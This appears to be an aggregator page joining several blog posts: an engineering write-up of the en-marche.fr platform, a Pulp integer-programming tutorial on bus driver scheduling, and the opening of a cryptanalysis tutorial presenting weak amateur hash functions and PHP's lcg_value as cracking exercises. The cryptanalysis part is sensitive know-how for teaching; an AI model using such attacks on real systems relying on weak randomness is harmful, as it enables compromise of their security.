The Continuous Delivery process, as well as the unit and functional tests, is handled by CircleCI. We also use StyleCI (to ensure that new code matches the coding style of the rest of the project) and SensioLabsInsight (to perform automatic code quality analyses). These three services are configured as checks that each Pull Request must pass before merging it.

When a Pull Request is merged, the Continuous Delivery process starts (see theconfiguration file):

Authenticate on Google Cloud using a Circle CI environment variable.
Build the Javascript files for production.
Build the three Docker images of the project (app, mails worker, users lists worker).
Push the built images to Google Container Registry.
Use the kubectl command line tool to update the staging server (a rolling update).

The only process performed manually (on purpose) is the SQL migration. Even if that can be automated, we prefer to carefully review those migrations before applying them to prevent serious errors on production.

Front-end

The application front-end doesn't follow the single-page application pattern. In fact, we wanted to use the least amount of Javascript possible to improve performance and rely on the native browser features.

React + Webpack

The JavaScript code of the application is implemented using React compiled with Webpack. We don't use Redux - or even React-Router - but pure React code, and we load the components only in specific containers on the page, instead of building the whole page with them. This is useful for two reasons:

The HTML content is fully rendered before React is loaded, and then React modifies the page contents as needed. This makes the application usable without JavaScript, even when the page is still loading on slow networks. This technique is called "progressive enhancement" and it dramatically improves the perceived performance.
We use Webpack 2 with tree shaking and chunks loading, so the components of each page are only loaded when necessary and therefore do not bloat the minified application code.

This technique lead us to organize the front-end code as following:

A front/ directory at the root of the application stores all the SASS and JavaScript files.
A tiny kernel.js file loads the JavaScript vendors and application code in parallel.
An app.js file loads the different application components.
In the Twig templates, we load the components needed for each page (for example, the address autocomplete component.

Front-end performance

Front-end performance is often overlooked, but the network is usually the biggest bottleneck of your application. Saving a few milliseconds in the backend won't take you too far, but saving 3 or more seconds of loading time for the images will change the perception of your web site.

Images were the main front-end performance issue. Campaign managers wanted to publish lots of images, but the users want fast-loading pages. The solution was to use powerful compression algorithms and apply other tricks.

First, we stored the image contents on Google Cloud Storage and their metadata in the database (using a Doctrine entity called Media). This allows us, for example, to know the image dimensions without needing to load it. This helps us creating a web page design that doesn't jump around while images load.

Second, we combined the Media entity date with the Glide library to implement:

Contextual image resizing: for example, the images displayed on the small grid blocks in the homepage can be much smaller and of lower resolutions than the same images displayed as the main article image.
Better image compression: all images are encoded as progressive jpegs with a quality of 70%. This change improved the loading time dramatically compared to other formats such as PNG.

The integration of Glide into Symfony was made with a simple endpoint in theAssetController and we used signatures and the cache to mitigate DDoS attacks on this endpoint.

Third, we lazy loaded all images below the scroll, which consists in three steps:

Load all the elements above the scroll as fast as possible, and wait for the ones below it.
Load ultra low resolution versions of the images below the scroll (generated with Glide) and use local JavaScript code to apply a gaussian blur filter to them.
Replace these blurred placeholders when the high quality images are loaded.

We implemented an application wide Javascript listener to apply this behavior everywhere on the web site.

Forms

The project includes some interesting forms. The first one is theform to sign up for the web: depending upon the country and postal code fields, the city field changes from an input text to a prepopulated select list.

Technically there are two fields: “cityName” and “city” (the second one is the code assigned to the city according to the French regulations). The Form component populates these two fields from the request, as usual.

On the view side, only the cityName field is displayed initially. If the selected country is France, we use some JavaScript code to show the select list of cities. This JavaScript code also listens to the change event of the postal code field and makes an AJAX request to get the list of related cities. On the server side, if the selected country is France, we require a city code to be provided and otherwise we use the cityName field.

This technique is a good example of the progressive enhancement technique discussed a bit earlier in this article. The JavaScript code, as everything else, is just a helper to make some things nicer, but it's not critical to make the feature work.

As these of address fields are used a lot in the application, we abstracted it to an AddressType form type associated with an address Javascript component.

The other interesting form is the one that lets you send an email to someone trying to convince them to vote for the candidate. It's a multi-step form that asks some questions about that other person (gender, age, job type, topics of interest, etc.) and then generates customized content that can be sent by email.

Technically the form combines a highly dynamic Symfony Form with the Workflow component, which is a good example of how to integrate both. The implementation is based on a model class called InvitationProcessor populated from a multi-step and dynamic form type and storing the contents in the session. The Workflow component was used to ensure that the model object is valid, defining which transitions were allowed for each model state: see InvitationProcessorHandler and workflows.yml config.

Search Engine

The search engine, which is blazing fast and provides real-time search results, is powered by Algolia. The integration to index the application entities (articles, pages, committees, events, etc.) is made with the AlgoliaSearchBundle.

This bundle is really useful. We just added a few annotations to the Doctrine entities and after that, the search index was automatically updated whenever an entity is created, updated or deleted. Technically, the bundle listens to the Doctrine events, so you don't need to do anything to keep the search contents always updated.

Security

As any other high-profile web site, we were the target of some attacks coordinated and carried out by powerful organizations. Most of the attacks were of brute-force nature and the aim was to take the web site down rather than infiltrate it.

The web site was targeted by DDoS attacks eight times in the whole campaign, five of them in the final two weeks. They had no impact on the Symfony app because of the Cloudflare mitigation and our on-demand scalability based on Kubernetes.

First, we suffered three attacks based on WordPress pingbacks. The attackers used thousands of hacked WordPress websites to send pingback requests to our website, quickly overloading it. We addedsome checks in the nginx configuration to mitigate this attack.

The other attacks were more sophisticated and required both Cloudflare and Varnish to mitigate them. Using Cloudfare to cache assets was so efficient that we thought there was no need for a reverse proxy. However, a reverse proxy was proven necessary during DDoS attacks: in the last days of the campaign, the attacks were huge (up to 300,000 requests per second) and we had to disable the user system and enable the "Cache Everything" flag on Cloudfare.

There's nothing you can do to prevent security attacks, but you can mitigate them by complying with the best practices of Symfony, which, by the way, is one of the few open source projects that hasconducted a public security audit.

Open Source

The en-marche.fr web platform and its related projects have been open sourced in the@EnMarche GitHub account. We didn't promote this idea much though, because open source is pretty complex to explain to non-technical people. However, we received some contributions from people that found the project and were glad that it was open source.

We are also thinking about giving back to Symfony by contributing some elements developed for the project. For example, theUnitedNationsCountryType form type could be useful for some projects. We also developed an integration with the Mailjet service that could be released as a Symfony bundle.

↧

Breaking Through the Normalization Barrier: A Self-Interpreter for F-omega [pdf]

May 20, 2017, 12:37 am

≫ Next: An Intro to Integer Programming for Engineers: Simplified Bus Scheduling

≪ Previous: An open-source web platform for the new President of France

Download PDF

↧

An Intro to Integer Programming for Engineers: Simplified Bus Scheduling

May 19, 2017, 10:43 am

≫ Next: Hacker News Readers as Progressive Web Apps

≪ Previous: Breaking Through the Normalization Barrier: A Self-Interpreter for F-omega [pdf]

Image: Steve Skiena

This article is part of Remix’s series on the software engineering problems we face. In this installment, Remix Engineer Dan Hipschman walks through bus driver scheduling and a simplified approach to solving it using integer programming.

I studied NP-Hardness in school but never tackled any problems in real life. Until now.

At Remix, I finally encountered NP-Hardness, adding a powerful new tool called integer programming to my tool belt. This is an intro to integer programming for engineers who haven’t used it. The goal is for you to start thinking about some ways you can use integer programming and wanting to learn more.

The Bus Driver Scheduling Problem

Let’s start with a motivating example. At Remix we improve public transportation, especially bus systems. Have you ever wondered how bus drivers coordinate their lunch breaks? Or if you aren’t on the bus that often, maybe you’ve wondered how flight attendants and pilots fly around the world and end up back home, which is a similar problem. We’re going to solve the problem of scheduling bus driver shifts in this post. I’m going to include working code, so for the full experience, please break out your shell and editor to follow along.

Let’s frame the problem. Say we have four bus routes, called A, B, C, and D. Let’s assume that each route takes an hour to complete. They’re loops, so they start and end in the same place. Each route has one bus running on it from 9 AM until 9 PM. Finally, the routes all converge at the same point every hour on the hour, so it would be easy for drivers to switch shifts and take their lunch breaks at that location. I drew some demo routes that all converge in the top right of the map to make this clear.

Since our bus service runs from 9 AM until 9 PM, and each route takes an hour to complete, we’ll have 12 full trips for each route (48 total trips). Let’s represent each trip as a tuple: (route_name, hour_of_day). Let’s write a function to generate these. Don’t worry if you don’t know Python, we’ll keep it simple.

Here’s our resulting 48 trips:

>>> generate_trips('ABCD', 9, 12 + 9)
[('A', 9), ('A', 10), ('A', 11), ('A', 12), ('A', 13), ('A', 14), ('A', 15), ('A', 16), ('A', 17), ('A', 18), ('A', 19), ('A', 20), ('A', 21), ('B', 9), ('B', 10), ('B', 11), ('B', 12), ('B', 13), ('B', 14), ('B', 15), ('B', 16), ('B', 17), ('B', 18), ('B', 19), ('B', 20), ('B', 21), ('C', 9), ('C', 10), ('C', 11), ('C', 12), ('C', 13), ('C', 14), ('C', 15), ('C', 16), ('C', 17), ('C', 18), ('C', 19), ('C', 20), ('C', 21), ('D', 9), ('D', 10), ('D', 11), ('D', 12), ('D', 13), ('D', 14), ('D', 15), ('D', 16), ('D', 17), ('D', 18), ('D', 19), ('D', 20), ('D', 21)]

The driver scheduling problem is that we have some work that needs to be done, and we need to assign it to drivers. In other words, we want to come up with a set of duties for the bus drivers, where a duty is simply a list of trips the need to drive. Every trip must be part of exactly one driver’s duty. Let’s further assume we have some rules from payroll:

Each duty over four hours should allow the driver to have a break
Drivers get paid for each hour they work, but not for breaks
They get a minimum pay of eight hours for coming into work (known as guaranteed pay)
They get 1.5x pay for each hour they work over eight hours (overtime pay)

We’d like not only to determine a set of duties, but the payroll department would like us to minimize driving costs. How do we do this? Well, as you might have guessed, we use integer programming… somehow. But first let me explain what integer programming is.

What Is Integer Programming Anyway?

As a precursor to integer programming, I’m going to define linear programming. Linear programs are mathematical models and there are algorithms to solve them. Let’s start with a linear expression. This is called the objective function:

The goal of linear programming is to minimize some objective function. By “some” objective function, I mean that n and the a’s are all known for a particular problem. E.g., 3 * x1 + 14 * x2.

Now, of course, if that was all there was to it, we could just set all the x to zero. However, linear programs are also allowed to have one or more constraints. Constraints are each simply another linear expression, set less than or equal to zero. Note that the coefficients of the x’s can be different than the objective, and there can be a constant term as well. E.g.,

And so on. There can be as many constraints as you like. Note that some factors in the constraints could be zero, effectively meaning that not every variable needs to be in every constraint.

Equality is allowed, using a sort of “trick” which you can verify. The following:

is equivalent to:

OK, so given the objective and the constraints, the goal of linear programming is to minimize the objective.

Let’s Jump Into a Shell

Let’s make this concrete and jump into a shell. We can install and use a Python integer programming solver library to demonstrate all this (it also solves linear programs). The Python package is called Pulp. Here’s a demo:

$ pip install pulp
$ python
>>> from pulp import *
>>> x1 = LpVariable('x1')
>>> p = LpProblem('p', LpMinimize)
>>> p += x1
>>> p.solve()
1
>>> LpStatus
{0: 'Not Solved', 1: 'Optimal', -2: 'Unbounded', -1: 'Infeasible', -3: 'Undefined'}
>>> x1.value()
0.0

Let’s walk through this line by line.

$ pip install pulp

This simply installs pulp. If you’re not in a virtualenv, you might need to use sudo.

>>> from pulp import *

This imports Pulp. I’m going to be lazy and import everything into the global namespace using *. Everything in Pulp starts with “Lp” or “lp” so it should be clear what came from the module.

>>> x1 = LpVariable('x1')

This creates a variable. The argument is the name, which is arbitrary (just make it unique if you create more than one variable).

>>> p = LpProblem('p', LpMinimize)

This creates a problem, which is Pulp’s way of keeping pieces of the linear program together. The first argument is another arbitrary name. The second is LpMinimize because the default is to maximize the objective. (Minimizing and maximizing are mathematically equivalent — multiply the objective by -1 — so linear programming can do both).

We’ll “add” the objective function with the following syntax (Pulp uses a lot of operator overloading):

>>> p += x1

Hence our objective function is as follows:

Not very exciting, but let’s see what happens.

>>> p.solve()
1
>>> LpStatus
{0: 'Not Solved', 1: 'Optimal', -2: 'Unbounded', -1: 'Infeasible', -3: 'Undefined'}

The solve function returns a status. The different statuses are described in LpStatus. In this case, Pulp is telling us it found an optimal solution to the problem. After calling solve, the variables will have their value set to whatever minimizes the objective. So let’s inspect:

>>> x1.value()
0.0

Pulp tells us that the assigning 0 to x1 minimizes the objective (remember that all the variables are nonnegative). In this case the problem was trivial.

So let’s add a constraint:

>>> p += x1 >= 1
>>> p.solve()
1
>>> x1.value()
1.0

This adds a constraint that x1 >= 1, and then re-solves. Obviously the minimal value of x1 is now 1, since 0 is not allowed by the constraint. Now our complete linear program is:

Progress! We’ve learned how to write and solve linear programs using Pulp.

Solving the Driver Scheduling Problem

Let’s move on to integer programming, and how it gets us closer to solving our driver scheduling problem.

An integer program is exactly the same as a linear program, with the additional constraint that all x are integers. I.e,

Without getting into theory, I’ll just mention that solving integer programs is an NP-hard problem. However, there are algorithms that can often solve them much faster than brute force.

Pulp can also solve integer programs, which I’ll show you in a bit. But first, let’s discuss the high level approach to how integer programs will solve our original driver scheduling problem. We’ll solve our problem by modeling it as a weighted set partitioning problem. This image gives an intuitive idea of the problem:

On the left we have 12 items (the dots) and 7 sets containing different combinations of items. The solution to the set partitioning problem is the fewest number of sets which include all the items with no overlap. — Image by Steven Skiena.

The idea is that we have a set of items, represented by the points in the lefthand image above. We also have a set of sets, each represented by a squiggly loop in the left image. In this case, for example, there are seven sets (trust me, since counting them is probably bad for your eyes). The set partitioning problem is to find the smallest number of sets that contain all the items (points), without any overlap between sets (hence a “partition”). Every point must be in one and exactly one set. The solution to the problem above is shown on the righthand side.

The weighted set partitioning problem is when we assign a cost to each set. Then, instead of minimizing the number of sets, we minimize the sum of the values of the sets we choose. You can see that if we set all the weights to one, we get the original set partitioning problem.

Set partitioning is NP-complete (both weighted and unweighted). However, we can use integer programming to solve it optimally. NP-complete doesn’t mean that problems are always slow to solve. It only means that we can construct degenerates cases that cause any general algorithm to run slowly some of the time. At least, to the best of our knowledge (unless someone proves P=NP). Integer programs can often be solved relatively quickly.

In our problem, the dots in the set partitioning diagram are trips a bus takes from its origin to its destination (our tuples), and the sets are potential driver duties. In other words, each duty is a set of trips that a driver could potentially do. We’ll assign a weight to those sets using the driver pay rules we defined above (overtime, guarantee pay, etc.). When we solve the weighted set partitioning problem, we’ll get the set of duties that cover all the trips and minimize the sum of individual drivers’ costs. This is exactly what we want.

So here’s how we’ll do it. Each potential duty will be a variable (an x) in our integer program. We’ll further constrain all the x to be between zero and one. Since they’re integers, this actually restricts them to be exactly zero or one. The idea behind this is that a particular x will be one in the solution if the solver decides that using the duty is part of the optimal solution, and zero if the duty is discarded as not being part of the optimal solution.

The coefficient of each x is the cost of that duty in terms of driver pay.

Hence our integer program looks like this (let’s use p for pay instead of the a’s we were using above):

This means we have n potential duties. Each p is the driver pay (hence payroll cost) of the duty. We want Pulp to choose some x’s to be zero and some to be one. By doing this, our objective function will turn into the sum of the payments we have to make. And we want to minimize this.

Of course, as is, there are no constraints that some x need to be selected (set to one) at all. Hence, Pulp will helpfully set all x to zero to minimize the objective. What constraints do we need to add?

Well, every trip needs to be in exactly one duty. So we can add a constraint for every trip, so that the x’s corresponding to the duties that trip appears in sum up to 1. For example, we might have a constraint like this:

This assumes for simplicity’s sake that the first five x’s correspond to the duties containing trip ('A', 9). Likewise, we’d have a constraint like this for every other trip.

These constraints say that for a given trip, exactly one duty must include it. No more, no less.

Time to Write Some Code!

OK, so we’re ready to write some code to solve our problem! Well, we’re close! But there’s one more hitch. Where are we going to get all the possible duties from? Generating every possible duty explodes exponentially with the number of trips. Hence, for now, we’ll randomly generate duties, and see what happens.

We already have code written above to generate the set of trips. Let’s write a function to randomly generate some duties from those trips. We’ll make sure that we don’t generate a duty with multiple trips that occur at the same time.

So let’s write it like this:

We’ll randomly choose the number of trips in the duty
Then we’ll randomly choose the hours for those trips
Then we’ll randomly choose the routes for each trip

Here’s the fully functioning code to generate trips and duties (extending the code above):

When I run this, here’s what I get:

$ ./duty_generation.py
[[('A', 14), ('A', 18)],
[('A', 9), ('B', 11), ('B', 12), ('D', 14), ('A', 15), ('A', 16), ('D', 18)],
[('C', 17), ('B', 18)],
[('C', 18)],
[('B', 9), ('C', 11), ('A', 16), ('B', 18), ('D', 19), ('C', 20)]]

Great! Now let’s write a function that tells us how much each duty costs:

And here’s what the output looks like when I run it (I actually ran it a few times to get an interesting mix of costs):

[(1000000.0,
[('C', 9),
('A', 10),
('C', 11),
('C', 12),
('B', 13),
('A', 14),
('B', 15),
('C', 16),
('A', 17),
('C', 18),
('B', 19),
('B', 20)]),
(8, [('B', 12), ('A', 13), ('C', 17)]),
(8, [('B', 11), ('D', 13), ('D', 14), ('A', 16), ('A', 17), ('C', 19)]),
(8, [('C', 16)]),
(11.0,
[('C', 10),
('A', 11),
('C', 12),
('D', 13),
('C', 14),
('D', 15),
('A', 16),
('A', 18),
('B', 19),
('C', 20)])]

The Fun Part

OK! Now for the really fun part, solving the problem! Here’s the code. Recall the Pulp code we wrote above, as we’re building on top of it.

Here’s the complete runnable code.

Let’s run it and see what happens. The output will be fairly long because I’m asking Pulp to print a representation of the problem. I’ll truncate some repetitive parts to make it shorter:

driver_scheduling:
MINIMIZE
12.5*x1 + 8*x10 + 8*x11 + 8*x12 + 8*x13 + 8*x14 + 8*x15 + 8*x16 + 8*x17 + 8*x18 + 8*x19 + 9.5*x2 + 8*x20 + 8*x21 + 8*x22 + 8*x23 + 8*x24 + 8*x25 + 8*x26 + 8*x27 + 8*x28 + 8*x29 + 8*x3 + 8*x30 + 8*x31 + 8*x32 + 8*x33 + 8*x34 + 8*x35 + 8*x36 + 8*x37 + 8*x38 + 8*x39 + 1000000.0*x4 + 8*x40 + 8*x41 + 8*x42 + 8*x43 + 8*x44 + 8*x45 + 8*x46 + 8*x47 + 8*x48 + 8*x49 + 11.0*x5 + 8*x50 + 8*x51 + 8*x52 + 8*x53 + 8*x6 + 8*x7 + 8*x8 + 8*x9 + 0.0
SUBJECT TO
_C1: x7 = 1

_C2: x33 = 1

_C3: x1 + x45 = 1

_C4: x14 + x2 + x5 = 1

_C5: x1 + x20 + x4 = 1

...

_C47: x25 + x4 = 1

_C48: x24 = 1

VARIABLES
0 <= x1 <= 1 Integer
...
0 <= x9 <= 1 Integer

Optimal
Cost: 239.5
[[('B', 9),
('B', 10),
('B', 11),
('D', 12),
('D', 13),
('D', 14),
('D', 16),
('B', 17),
('D', 18),
('D', 19),
('B', 20)],
[('D', 10),
('C', 11),
('B', 13),
('B', 14),
('D', 15),
('C', 16),
('A', 17),
('B', 18),
('A', 19),
('D', 20)],
[('A', 9)],
[('A', 10)],
[('A', 11)],
[('A', 12)],
[('A', 13)],
[('A', 14)],
[('A', 15)],
[('A', 16)],
[('A', 18)],
[('A', 20)],
[('B', 12)],
[('B', 15)],
[('B', 16)],
[('B', 19)],
[('C', 9)],
[('C', 10)],
[('C', 12)],
[('C', 13)],
[('C', 14)],
[('C', 15)],
[('C', 17)],
[('C', 18)],
[('C', 19)],
[('C', 20)],
[('D', 9)],
[('D', 11)],
[('D', 17)]]

So for all our hard work, we have a solution! Hooray! But it’s a pretty crummy one. Most drivers do one trip, get paid the minimum of 8 hours, and go home. Well, it’s good for them, but payroll won’t be happy. This is because we’re only generating 5 duties, of course. Let’s increase that to 100 duties. And let’s also time how long it takes. Here’s the result (without Pulp output this time):

Optimal
Cost: 120
[[('A', 9), ('C', 11), ('D', 13), ('A', 14), ('D', 15)],
[('A', 10), ('D', 11), ('C', 13), ('A', 16), ('B', 18), ('D', 19)],
[('C', 17)],
[('D', 14), ('C', 15), ('D', 16), ('D', 17), ('A', 19)],
[('C', 9), ('B', 10), ('D', 18), ('C', 19), ('A', 20)],
[('B', 11), ('C', 14), ('C', 16), ('A', 18), ('B', 19), ('B', 20)],
[('D', 10), ('A', 12), ('A', 13), ('B', 16), ('A', 17), ('C', 18), ('C', 20)],
[('D', 9), ('C', 10), ('D', 12), ('B', 13), ('B', 17), ('D', 20)],
[('A', 11)],
[('A', 15)],
[('B', 9)],
[('B', 12)],
[('B', 14)],
[('B', 15)],
[('C', 12)]]

real 0m1.297s
user 0m0.110s
sys 0m0.000s

That’s much better! The cost is almost half! But it’s still not great. Let’s generate 1000 duties.

Optimal
Cost: 70.0
[[('C', 9), ('C', 11), ('C', 12), ('A', 15), ('C', 18), ('A', 19)],
[('A', 10), ('A', 11), ('D', 12), ('A', 13), ('A', 16), ('D', 18), ('C', 20)],
[('A', 9),
('C', 10),
('A', 12),
('C', 13),
('B', 14),
('D', 15),
('D', 16),
('C', 17),
('B', 19)],
[('D', 10),
('B', 12),
('B', 13),
('A', 14),
('B', 16),
('A', 17),
('B', 18),
('C', 19),
('B', 20)],
[('B', 9),
('B', 10),
('B', 11),
('D', 13),
('D', 14),
('B', 15),
('C', 16),
('B', 17),
('A', 18),
('D', 19)],
[('D', 9), ('D', 11), ('C', 14), ('D', 17), ('A', 20)],
[('D', 20)],
[('C', 15)]]

real 4m41.586s
user 3m11.270s
sys 0m0.990s

Phew, that’s much better. But also much slower! Well, we are solving an NP-complete problem after all. In practice, we could speed this up by generating duties more cleverly. E.g., there’s no reason for drivers to jump back and forth between routes all the time. If we limited that, we could generate more “good” duties, while ignoring “bad” duties without passing them to the solver.

There are also much more advanced techniques to speed up and improve results, but the intent of this article is to whet your appetite.

Integer Programming as a Flexible Framework

So that’s it! We’ve used integer programming to solve our problem. And we’ve saved the effort of thinking up an algorithm for this specific problem, which would probably be either slow, or suboptimal, or both. Integer programming also gives us a very flexible framework for making changes. E.g., if we can customize the cost function to penalize some duties (like those that switch routes too often because that’s confusing). When the problem gets more complicated, such as routes ending in different locations, or trips starting and ending at different times, integer programming can handle that really easily. If you don’t want something to happen you can either just add a severe penalty (like we did with the driver break rule), or add a constraint.

There are many other interesting classes of problems that can be solved using integer programming as well. Since solving an integer program is NP-hard, it can in fact be used to solve many NP and NP-complete problems (as long as you can model it as an integer program without exponential growth). This is a very powerful tool, because it’s often much easier and effective to model an NP or NP-complete problem as an integer program than it is to write an algorithm to solve it. You can also solve polynomial time algorithms using integer programming, and this is still often useful as a first cut solution, and it often turns out to be fast enough.

To name just a few other examples of problems that integer programming is well suited to solve:

Transportation problems (such as package delivery, or resource delivery such as energy distribution)
Warehouse and container packing problems
Matching problems (such as what stock brokerages do to match buyers with sellers, or scheduling which sports teams play each other)
Map coloring

By the way, Pulp is a Python wrapper around back end solvers written in C. By default it uses CBC, which is an open source solver. There are commercial solvers as well. These are often used for harder problems in industry because they can be much faster. One well-known commercial solver is called Gurobi, and they have many example usages of integer programming. I encourage you to look through some Pulp case studies as well.

I hope you’ve found this interesting! Please comment or share this if you did. We’re planning to write another post going into more depth, so follow us if you’re interested.

Want to work on these types of problems? Remix is hiring!

↧

Hacker News Readers as Progressive Web Apps

May 19, 2017, 12:34 pm

≫ Next: Learning to break ciphers

≪ Previous: An Intro to Integer Programming for Engineers: Simplified Bus Scheduling

TodoMVC has helped thousands of developers select an MV* framework for their JavaScript applications. However, the web ecosystem has evolved in the past few years allowing us to build powerful applications using modern browser capabilities.

To provide developers with examples, we collected a list of Hacker News clients built with a number of popular JavaScript frameworks and libraries. Each implementation is a complete Progressive Web App that utilizes different progressive technologies to provide a fast, reliable and engaging experience.

↧

Learning to break ciphers

May 19, 2017, 3:40 pm

≫ Next: Fiat Chrysler to Modify 100,000 Vehicles After Accusations of Emissions Cheating

≪ Previous: Hacker News Readers as Progressive Web Apps

Every now and then, I read a question about learning how to break ciphers, or more generally how to become a cryptographer/cryptologist. From my viewpoint, the most important part of learning this skill is not advanced mathematics, but instead first learning how to think like a cryptographer. When you go to break a cipher, there are no instructions on how to do it. You simply need to get your hands dirty with the function under consideration and look for things that do not seem desirable for a secure function of that type. While having a bag of tricks is going to help, ultimately it’s your creativity, persistence, and skills that are more likely going to make the difference.

I believe that there are a number of hackers out there that already know how to think the right way, and it is simply a matter of exercising that thought process on some reasonable, non-contrived examples to begin to understand what it takes to be a cryptologist. You should not need to know advanced mathematics or advanced cryptographic techniques (such as linear or differential cryptanalysis) to get started. So welcome to my blog post, which provides a number of exercise for you to practice on. These examples mostly come from cryptanalysis that I have done, largely because I know the results, I was able to dig them up, and attacking them did not use advanced techniques. I am building a list of other examples at the bottom of this blog, and invite other readers to add to it.

Before we begin, I want to point out some other resources on this topic:

Schneier’s Self-Study Course in Block Cipher Cryptanalysis is a great resource, but in my mind it is not the ideal place to start — from my viewpoint, it is the next step after you prove you can break ciphers such as what I have below. By the way, you absolutely should read Schneier’s article So, You Want to be a Cryptographer.
The Matasano Crypto Challenges. While they are similar in same spirit of what I am writing here, my focus is at a lower level — breaking specific cryptographic primitives rather than constructs from these primitives. Regardless, the Matasano challenges are another great place to start.
The Simon Singh Cipher Challenges from his book, The Code Book. This book is really fun to read, and will get you into the spirit of breaking his challenges. But the first challenges are too easy and the last ones are very hard: it is really the middle ones that are most interesting.

I’m adding to existing resources because I thought I have a nice, small collection of my own that I have accumulated over the years. Like the Matasano challenges, my focus is on providing modern examples that are easy to break without complex mathematics or advanced cryptographic techniques. These examples illustrate how to think like a cryptographer without requiring all the complex background in the most advanced cryptanalytic techniques. If you can solve these problems (and your solutions may not necessarily be the same as mine), then you have the right type of thinking to become a cryptographer. This blog post is written for computer scientists without deep mathematics skills that want to learn how to do cryptanalysis, and teachers of cryptography for computer science students.

The examples come from different sources. For example, I have a few proposals by amateurs that were easily cracked, including a couple from the old sci.crypt Google group (it was a popular meeting place for crypto-geeks before Google took over). I have at least one proposal by an expert in some other field that was attempting to apply his skills to cryptography despite having little background in crypto. I have one design that was built into software and relied upon for real-world security. And then I have one example of something that was not intended for cryptographic purposes yet sometimes is misused by developers who do not understand that. So let’s get started!

PHP’s lcg_value( ) is a pseudo random number generator (PRNG) that is not intended to provide cryptographic security. Nevertheless, it occasionally gets used in ways that it should not be used.

The internal state of the PRNG has a total possibility of 2^62 combinations, which is too much to brute force this day in age. However, one technique that is often employed in cryptanalysis is trying all possibilities for half of the bits (2^31 combinations here) and for each candidate, see if you can compute the remaining bits in constant time. You then check whether the candidate is right by computing future outputs of the assumed internal state to to see whether or not it matches. If it does, then you presume you have the right state, and if it does not match, then you know the candidate is wrong.

It turns out that this technique does work for lcg_value( ), and thus it can be cracked in 2^31 operations. The details are here (the page describes the algorithm, how to attack it, and then provides a link to my solution). This could take anywhere from a half-day to two days, depending upon your experience. As a bonus, there is an advanced topic at the end of the link — how to crack lcg_value( ) if you only get a fraction of the output bits per iteration: this is a bit harder.

Every year there is the Crypto conference in Santa Barbara that has a light-hearted “rump session” where participants can present research-in-progress or anything of interest to the cryptographic community. In the Crypto 2005 rump session, a researcher presented his new hash function based upon chaos theory. The researcher was unknown to the cryptographic community. He put up lots of graphs of his hash function, which might have been intimidating to one with no cryptographic experience, but that was not most of the audience, and hence hardly anybody listened to his presentation. But I listened carefully, because I suspected an easy target that I wanted to have a go at.

Why did I suspect it an easy target? I knew absolutely zero about chaos theory, and had no intention to learning it. But what I saw was a guy who did not know anything about cryptography and how ciphers were attacked, and I was pretty sure I could find collisions in his hash function regardless of any graphs or mathematics behind his design. The only trick was getting an exact specification so that I can demonstrate that I can break it. This obstacle is often encountered in cryptanalysis — non-experts do not nail down their specification for whatever reason, but the cryptanalyst needs something concrete to demonstrate his attack. So I exchanged email with him a few times and we finally agreed that the following C code represents his hash function (where ROTL and ROTR are circular left and right bit rotations):

void hash( unsigned int *input, int len, unsigned int output[4] )
{
    unsigned int x, y, z, u, X, Y, Z, U, A, B, C, D, RV1, RV2, RV3, RV4;
    unsigned int M = 0xffff;
    int i, offset;
    x = 0x0124fdce; y = 0x89ab57ea; z = 0xba89370a; u = 0xfedc45ef;
    A = 0x401ab257; B = 0xb7cd34e1; C = 0x76b3a27c; D = 0xf13c3adf;
    RV1 = 0xe12f23cd; RV2 = 0xc5ab6789; RV3 = 0xf1234567; RV4 = 0x9a8bc7ef;

    for (i=0; i < len; ++i) {         offset = 4*i;         X = input[offset + 0] ^ x; Y = input[offset + 1] ^ y;         Z = input[offset + 2] ^ z; U = input[offset + 3] ^ u;          /* compute chaos */         x = (X & 0xffff)*(M-(Y>>16)) ^ ROTL(Z,1) ^ ROTR(U,1) ^ A;
        y = (Y & 0xffff)*(M-(Z>>16)) ^ ROTL(U,2) ^ ROTR(X,2) ^ B;
        z = (Z & 0xffff)*(M-(U>>16)) ^ ROTL(X,3) ^ ROTR(Y,3) ^ C;
        u = (U & 0xffff)*(M-(X>>16)) ^ ROTL(Y,4) ^ ROTR(Z,4) ^ D;
        RV1 ^= x; RV2 ^= y; RV3 ^= z; RV4 ^= u;
    }
    /* now run 4 more times */
    for (i=0; i < 4; ++i) {         X = x; Y = y; Z = z; U = u;         /* compute chaos */         x = (X & 0xffff)*(M-(Y>>16)) ^ ROTL(Z,1) ^ ROTR(U,1) ^ A;
        y = (Y & 0xffff)*(M-(Z>>16)) ^ ROTL(U,2) ^ ROTR(X,2) ^ B;
        z = (Z & 0xffff)*(M-(U>>16)) ^ ROTL(X,3) ^ ROTR(Y,3) ^ C;
        u = (U & 0xffff)*(M-(X>>16)) ^ ROTL(Y,4) ^ ROTR(Z,4) ^ D;
        RV1 ^= x; RV2 ^= y; RV3 ^= z; RV4 ^= u;
     }
     output[0] = RV1; output[1] = RV2; output[2] = RV3; output[3] = RV4;
}

Does it look intimidating? Well, once you start to get your hands dirty, you will see that it is not that bad at all. The loop at the bottom does not involve any inputs, so if we can create a collision in the top loop, then it will give a collision in the hash. The top loop takes blocks of 4 input words (128-bits) per iteration and mixes them into the existing state. Here’s the real killer: for any iteration, the attacker can make (X, Y, Z, U) to be whatever he wants because he can compute (x, y, z, u) at the beginning of that iteration(simply by processing the previous inputs) and choose the next inputs accordingly. Now there is still some ugly multiply and rotation stuff in there, but given that you can control (X, Y, Z, U), you can then make those multiplies and rotations behave in a convenient way for your attack. Suddenly, what seemed to be a ferocious looking lion is nothing more than a tiny kitty cat. Have a go yourself before you look at my attacks. This one was easy and really fun to break.

By the way, after breaking this one, you should have decent insight into why algorithms of the MD and SHA families have a pre-processing phase that involves the message length, and use a message expansion that makes sure that functions of the input words get mixed in multiple times per iteration.

Here is another easy one from amateur on the good old sci.crypt group. The author forgot to both declare and initialise the hash variable, so I fix-up the code below:

#define UL unsigned long
#define LEFT 13
#define RIGHT 19

UL hash[5];
void round() {
    hash[4] += hash[0] >> RIGHT; hash[0] += hash[0] << LEFT;     hash[0] += hash[1] >> RIGHT; hash[1] += hash[1] << LEFT;     hash[1] += hash[2] >> RIGHT; hash[2] += hash[2] << LEFT;     hash[2] += hash[3] >> RIGHT; hash[3] += hash[3] << LEFT;     hash[3] += hash[4] >> RIGHT; hash[4] += hash[4] << LEFT;
}

void processBlock(const UL in[25])
{
    int i, j, r, s;

    memset( hash, 0, sizeof(hash) );
    for (i = 0; i < 5; i++) {
       s = 0;
       for (r=0; r<5; r++) {
           for (j = 0; j < 5; j++) {
               hash[j] ^= in[j+s];
               hash[j]++;
           }
           round();
           s += 5;
       }
    }
}

